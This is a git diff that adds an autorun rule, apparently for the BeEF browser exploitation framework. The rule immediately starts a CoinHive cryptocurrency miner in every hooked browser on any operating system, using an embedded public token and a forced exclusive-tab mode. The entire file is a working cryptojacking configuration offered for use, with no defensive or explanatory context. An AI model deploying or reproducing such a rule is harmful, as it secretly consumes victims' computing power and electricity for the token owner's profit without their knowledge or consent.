diff --git a/arerules/coinhive_miner.json b/arerules/coinhive_miner.json new file mode 100644 index 000000000..3c5fad3e8 --- /dev/null +++ b/arerules/coinhive_miner.json @@ -0,0 +1,20 @@ +{"name": "Start CoinHive JavaScript miner", + "author": "bcoles", + "browser": "ALL", + "browser_version": "ALL", + "os": "ALL", + "os_version": "ALL", + "modules": [ + {"name": "coinhive_miner", + "condition": null, + "options": { + "public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV", + "mode":"FORCE_EXCLUSIVE_TAB", + "mobile_enabled":"" + } + } + ], + "execution_order": [0], + "execution_delay": [0], + "chain_mode": "sequential" +}